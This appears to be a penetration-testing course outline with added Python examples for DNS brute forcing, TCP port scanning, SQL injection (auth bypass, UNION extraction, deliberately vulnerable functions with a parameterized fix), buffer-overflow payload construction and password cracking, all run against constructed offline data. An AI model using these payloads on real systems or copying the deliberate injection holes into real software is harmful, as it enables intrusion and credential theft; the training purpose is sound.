Introduction to penetration testing:
Methodology
Objectives
Bash scripting:
Basic commands and redirections
Language structure
Variables, conditions, and loops
Passive information gathering:
- Open web information gathering
Search engines
Google dorks
Email harvesting
Netcraft
Whois enumeration
Networking tools:
Connecting to TCP/UDP ports
Listening on TCP/UDP ports
File transfer
Remote administration
Introduction to Wireshark
Traffic capturing and filters
Follow TCP stream
Traffic filtering
Advanced header filtering
Active information gathering:
- DNS enumeration
- DNS lookups
Forward lookup brute force
Reverse lookup brute force
DNS zone transfer
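Added example for the forward and reverse lookup brute-force steps above; it is not course material. Both functions take a resolver callable so they can be run offline against the constructed FAKE_ZONE data below (hypothetical hosts under example.test); the default resolvers use the system stub resolver. The wildcard check is the caveat a practitioner wants before trusting forward brute-force output.

```python
import ipaddress
import socket
import uuid
from typing import Callable, Iterable, List, Optional, Tuple

# Live resolvers: both go through the system stub resolver (/etc/resolv.conf).
def system_forward(name: str) -> Optional[str]:
    """A record lookup; None when the name does not exist."""
    try:
        return socket.gethostbyname(name)
    except socket.gaierror:
        return None

def system_reverse(ip: str) -> Optional[str]:
    """PTR lookup; None when there is no reverse record."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except (socket.herror, socket.gaierror):
        return None

# Constructed zone data so the example runs offline (hypothetical hosts, not real DNS).
FAKE_ZONE = {
    "www.example.test": "10.11.1.5",
    "mail.example.test": "10.11.1.10",
    "intranet.example.test": "10.11.1.20",
}
FAKE_PTR = {ip: name for name, ip in FAKE_ZONE.items()}

def fake_forward(name: str) -> Optional[str]:
    return FAKE_ZONE.get(name)

def fake_reverse(ip: str) -> Optional[str]:
    return FAKE_PTR.get(ip)

def wildcard_ip(domain: str, resolve: Callable[[str], Optional[str]] = system_forward) -> Optional[str]:
    """Resolve a random label under the domain. A hit means wildcard DNS is in
    place: every brute-forced name will "resolve" to this address, so such hits are noise."""
    return resolve(f"{uuid.uuid4().hex[:12]}.{domain}")

def forward_brute(domain: str, words: Iterable[str],
                  resolve: Callable[[str], Optional[str]] = system_forward) -> List[Tuple[str, str]]:
    """Forward lookup brute force: query <word>.<domain> for every word in the list."""
    noise = wildcard_ip(domain, resolve)
    hits = []
    for word in words:
        word = word.strip()
        if not word:
            continue
        fqdn = f"{word}.{domain}"
        ip = resolve(fqdn)
        if ip and ip != noise:
            hits.append((fqdn, ip))
    return hits

def reverse_brute(network: str,
                  resolve: Callable[[str], Optional[str]] = system_reverse) -> List[Tuple[str, str]]:
    """Reverse lookup brute force: PTR-query every host address in the network
    (e.g. "10.11.1.0/24") and keep the ones that have a name."""
    hits = []
    for addr in ipaddress.ip_network(network, strict=False).hosts():
        name = resolve(str(addr))
        if name:
            hits.append((str(addr), name))
    return hits

if __name__ == "__main__":
    words = ["www", "ftp", "mail", "intranet", "vpn"]   # tiny constructed wordlist
    for fqdn, ip in forward_brute("example.test", words, resolve=fake_forward):
        print(f"{fqdn:<28} {ip}")
    for ip, name in reverse_brute("10.11.1.0/28", resolve=fake_reverse):
        print(f"{ip:<16} {name}")
```

Against a live target, pass a real wordlist and leave the resolver at its default. The zone transfer step that follows is a single AXFR request to each authoritative server (`dig @ns1.example.com example.com axfr` or `host -l example.com ns1.example.com`); when it is allowed it hands over the whole zone and makes brute forcing unnecessary.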
TCP port scanning
UDP port scanning
Port scanning with Nmap
Service enumeration
OS fingerprinting
Nmap Scripting Engine (NSE)
SMB enumeration
SMTP enumeration
SNMP enumeration
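Added example for the TCP port scanning and service enumeration steps above (not course material): a full-connect scanner that classifies ports the way Nmap's `-sT` does (open / closed / filtered) and grabs the greeting banner that SSH, FTP and SMTP send first. The `fake_service` listener and its banners are constructed so the scan runs offline against loopback; nothing here is a real host.

```python
import socket
import threading
from concurrent.futures import ThreadPoolExecutor
from typing import Dict, Iterable, Tuple

def probe(host: str, port: int, timeout: float = 1.0) -> Tuple[str, str]:
    """Full TCP connect() probe of one port.
    open: the three-way handshake completed; closed: the host answered with RST;
    filtered: nothing came back before the timeout (a firewall dropping the SYN)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        sock.connect((host, port))
    except ConnectionRefusedError:
        sock.close()
        return "closed", ""
    except OSError:                 # includes timeouts (TimeoutError is an OSError)
        sock.close()
        return "filtered", ""
    banner = b""
    try:
        banner = sock.recv(256)     # SSH, FTP and SMTP greet the client first
    except OSError:
        pass
    finally:
        sock.close()
    return "open", banner.decode("ascii", errors="replace").strip()

def scan(host: str, ports: Iterable[int], workers: int = 50,
         timeout: float = 1.0) -> Dict[int, Tuple[str, str]]:
    """Probe ports concurrently; return {port: (state, banner)} for every non-closed port."""
    def one(port: int):
        return port, probe(host, port, timeout)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = dict(pool.map(one, ports))
    return {p: r for p, r in sorted(results.items()) if r[0] != "closed"}

def fake_service(banner: bytes) -> int:
    """Constructed local listener that greets each client with a banner (so the
    example runs offline); returns the ephemeral port it listens on."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    def serve():
        while True:
            try:
                client, _ = srv.accept()
            except OSError:
                return
            client.sendall(banner)
            client.close()
    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]

def closed_port() -> int:
    """A loopback port with nothing listening: bind to 0, read the number, release it."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port

if __name__ == "__main__":
    smtp = fake_service(b"220 mail.example.test ESMTP ready\r\n")   # constructed banners
    ssh = fake_service(b"SSH-2.0-OpenSSH_8.9\r\n")
    for port, (state, banner) in scan("127.0.0.1", [smtp, ssh, closed_port()]).items():
        print(f"{port:>5}/tcp {state:<8} {banner}")
```

A connect scan completes the handshake, so it shows up in the service's own logs; Nmap's default SYN scan needs raw sockets (root) to avoid that. The same probe does not work for UDP, where no reply can mean open or filtered, which is why UDP scanning is slow and needs protocol-specific payloads.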
Vulnerability scanning:
- Nmap vulnerability scanning
- Nessus vulnerability scanning
Web application attacks:
- Introduction to Web Proxy (Burp)
- Cross site scripting (XSS)
Cross site scripting types
Browser redirection and IFRAME injection
Cookie stealing and session information
- Local file inclusion
- Remote file inclusion
- SQL injection
Authentication bypass
Enumerating the database
Column number enumeration
Data extraction
Code execution
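Added example for the authentication bypass, column number enumeration and data extraction steps above; it is not course material. The in-memory SQLite database, its users and their passwords are constructed stand-ins for a target's backend. The two `vulnerable_*` functions are deliberately injectable (input pasted into the SQL string) so the payloads can be shown working, and `safe_login` is the bound-parameter fix.

```python
import sqlite3
from typing import Callable, List, Optional, Tuple

def build_db() -> sqlite3.Connection:
    """Constructed in-memory database standing in for the target's backend."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT);
        INSERT INTO users (username, password, role) VALUES
            ('admin', 'S3cret!', 'admin'),
            ('bob',   'hunter2', 'user');
    """)
    return con

def vulnerable_login(con, username: str, password: str) -> Optional[Tuple[str, str]]:
    # DELIBERATELY VULNERABLE: user input is pasted straight into the SQL string.
    sql = ("SELECT username, role FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    return con.execute(sql).fetchone()

def safe_login(con, username: str, password: str) -> Optional[Tuple[str, str]]:
    # Fixed version: bound parameters, so input can never change the query structure.
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return con.execute(sql, (username, password)).fetchone()

def vulnerable_lookup(con, username: str) -> List[tuple]:
    # DELIBERATELY VULNERABLE: a profile page that echoes the selected rows to the user.
    sql = f"SELECT id, username, role FROM users WHERE username = '{username}'"
    return con.execute(sql).fetchall()

def count_columns(lookup: Callable[[str], list], max_cols: int = 20) -> int:
    """Column number enumeration with ORDER BY n: the first n that errors is one
    past the number of columns in the original SELECT."""
    for n in range(1, max_cols + 1):
        try:
            lookup(f"x' ORDER BY {n}--")
        except sqlite3.OperationalError:
            return n - 1
    raise RuntimeError("more columns than max_cols")

def union_extract(lookup: Callable[[str], list], ncols: int, expr: str, source: str) -> list:
    """Data extraction with UNION SELECT: put `expr` in the first column, pad the
    rest with NULL so the column count matches, and read it from the echoed rows."""
    cols = ", ".join([expr] + ["NULL"] * (ncols - 1))
    payload = f"x' UNION SELECT {cols} FROM {source}--"
    return sorted(row[0] for row in lookup(payload))

if __name__ == "__main__":
    con = build_db()
    print("bypass :", vulnerable_login(con, "admin'--", "wrong"))
    print("fixed  :", safe_login(con, "admin'--", "wrong"))
    lookup = lambda s: vulnerable_lookup(con, s)
    n = count_columns(lookup)
    print("columns:", n)
    print("tables :", union_extract(lookup, n, "name", "sqlite_master WHERE type='table'"))
    print("creds  :", union_extract(lookup, n, "username || ':' || password", "users"))
```

The same ORDER BY and UNION technique carries over to other engines; only the catalogue table changes (`information_schema.tables` on MySQL and MSSQL instead of `sqlite_master`). The code execution step depends on the engine too: MySQL's `SELECT ... INTO OUTFILE` into the web root or MSSQL's `xp_cmdshell`, neither of which SQLite offers.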
Win32 buffer overflow exploitation:
- Introduction to the debugger
- Types of buffer overflow
- Fuzzing
- Replicating the crash
- Exploiting the vulnerability
Controlling EIP
Locating space for shellcode
Checking for bad characters
Redirecting the execution flow
Generating the shellcode
Getting a shell
Linux buffer overflow exploitation:
- Introduction to GDB
- Replicating the crash
- Exploiting the vulnerability
Controlling EIP
Locating space for shellcode
Checking for bad characters
Redirecting the execution flow
Generating the shellcode
Getting a shell
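Added example, not course material, serving the Win32 and the Linux buffer overflow sections above since the steps are the same: a Metasploit-style cyclic pattern to control EIP and find the offset, a bad-character string with a comparison against what the debugger dumped, and the final payload layout. The EIP value 0x39654138, the return address 0x625011af and the mangled byte are placeholders made up for the demonstration; the real ones come from the debugger on the target.

```python
import string
import struct
from typing import Optional, Union

def pattern_create(length: int) -> bytes:
    """Cyclic pattern in the pattern_create.rb style (Aa0Aa1Aa2...); every 4-byte
    window is unique across the full 20280-byte pattern."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length].encode()
    return "".join(chunks).encode()[:length]      # length > 20280: pattern exhausted

def pattern_offset(eip: Union[int, bytes], length: int = 20280) -> int:
    """Offset of the bytes that landed in EIP. The debugger shows EIP as a
    little-endian dword, so 0x39654138 corresponds to the pattern bytes '8Ae9'."""
    needle = struct.pack("<I", eip) if isinstance(eip, int) else eip
    return pattern_create(length).find(needle)

def badchars(exclude: bytes = b"\x00") -> bytes:
    """Every byte value 0x01..0xff except those already known to be bad."""
    return bytes(b for b in range(1, 256) if b not in exclude)

def first_mangled(sent: bytes, dumped: bytes) -> int:
    """Compare the bad-char string that was sent with the bytes dumped from memory
    in the debugger; return the index of the first byte altered or truncated, -1 if none."""
    for i, (a, b) in enumerate(zip(sent, dumped)):
        if a != b:
            return i
    return -1 if len(dumped) >= len(sent) else len(dumped)

def build_payload(offset: int, ret: int, shellcode: bytes,
                  total: Optional[int] = None, nops: int = 16) -> bytes:
    """Junk up to EIP + return address (little-endian) + NOP sled + shellcode + padding
    so the buffer keeps the length that produced the original crash."""
    payload = b"A" * offset + struct.pack("<I", ret) + b"\x90" * nops + shellcode
    if total is not None:
        if total < len(payload):
            raise ValueError("payload does not fit in the crash buffer")
        payload += b"C" * (total - len(payload))
    return payload

if __name__ == "__main__":
    print(pattern_offset(0x39654138))                       # placeholder EIP value
    sent = badchars(b"\x00")
    dumped = sent.replace(b"\x0a", b"\x00")                  # constructed: target mangles \x0a
    print(hex(sent[first_mangled(sent, dumped)]))
    shellcode = b"\xcc" * 4                                  # stand-in for msfvenom output
    print(len(build_payload(146, 0x625011af, shellcode, total=500)))  # placeholder JMP ESP address
```

The bad-character loop is iterative: remove the byte `first_mangled` reports, resend, and repeat until the dump matches, because a mangled byte often hides the ones after it. The return address must itself be free of bad characters and should point at a JMP ESP (or equivalent) in a module without ASLR or rebasing.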
Working with exploits:
Finding exploits in Kali
Finding exploits on the web
- Customizing and fixing exploits
Customizing an exploit
Password attacks:
Dictionary files
Key space brute force
pwdump and fgdump
Windows credential editor
Password profiling
Password mutating
Hydra, Medusa and Ncrack
Choosing the right protocol: Speed vs Reward
Password hashes
John the Ripper
Rainbow tables
Passing the hash in Windows
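Added example for the password profiling, mutation, key space and hash cracking steps above; it is not course material. The SAMPLE_HASHES "dump" is constructed here from made-up passwords and hashed with unsalted SHA-1 so the attack can be checked offline; the mutation rules (case, leet, year and symbol suffixes) are the common ones, not a transcription of any tool's rule set.

```python
import hashlib
import itertools
from typing import Dict, Iterable, Iterator, List

LEET = str.maketrans({"a": "4", "e": "3", "i": "1", "o": "0", "s": "5"})

def mutate(word: str, years=("2023", "2024"), suffixes=("!", "1", "123")) -> List[str]:
    """Password mutation: case and leet variants of a profiled word plus the
    year/symbol endings people actually append."""
    forms = {word, word.lower(), word.upper(), word.capitalize(),
             word.lower().translate(LEET), word.capitalize().translate(LEET)}
    out = set(forms)
    for base in forms:
        for tail in itertools.chain(years, suffixes):
            out.add(base + tail)
        for year in years:
            for suffix in suffixes:
                out.add(base + year + suffix)
    return sorted(out)

def keyspace(charset: str, min_len: int, max_len: int) -> Iterator[str]:
    """Key space brute force: every string over charset from min_len to max_len
    characters (len(charset) ** n candidates per length, so this explodes fast)."""
    for n in range(min_len, max_len + 1):
        for combo in itertools.product(charset, repeat=n):
            yield "".join(combo)

def crack(hashes: Dict[str, str], candidates: Iterable[str], algo: str = "sha1") -> Dict[str, str]:
    """Offline dictionary attack: hash each candidate once and look it up against
    every dumped hash (label -> hex digest). Returns label -> recovered password."""
    wanted = {h.lower(): label for label, h in hashes.items()}
    found = {}
    for pw in candidates:
        digest = hashlib.new(algo, pw.encode()).hexdigest()
        if digest in wanted:
            found[wanted[digest]] = pw
            if len(found) == len(wanted):
                break
    return found

# Constructed "dump": unsalted SHA-1 of passwords built from profiled words (not real accounts).
SAMPLE_HASHES = {
    "alice": hashlib.sha1(b"Summer2024!").hexdigest(),
    "bob":   hashlib.sha1(b"p455w0rd").hexdigest(),
    "pin":   hashlib.sha1(b"4271").hexdigest(),
}

if __name__ == "__main__":
    wordlist = itertools.chain(mutate("summer"), mutate("password"))   # profiled words
    print(crack(SAMPLE_HASHES, wordlist))
    print(crack(SAMPLE_HASHES, keyspace("0123456789", 4, 4)))         # 10**4 candidates
```

Hashing every candidate against the whole dump at once is what makes unsalted hashes cheap to attack and is the same trade-off rainbow tables push further (precompute once, look up many). A per-user salt defeats both, and a deliberately slow hash (bcrypt, scrypt, Argon2) makes even the dictionary pass expensive.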
Data exfiltration:
Non-interactive shell
Uploading files
Metasploit framework:
- Introduction to user interfaces
- Installation and updates
- Metasploit framework structure
Auxiliary modules
Exploit modules
Staged and non-staged payloads
Executable payloads
Meterpreter payloads
Multi handler
Meterpreter post exploitation
Post exploitation modules
Reporting:
- Vulnerability risk rating
CVSS and CWE concepts
CVSS calculation tools
OWASP risk rating
- Vulnerability definition and details
- Recommendations and fix priority
- Writing your report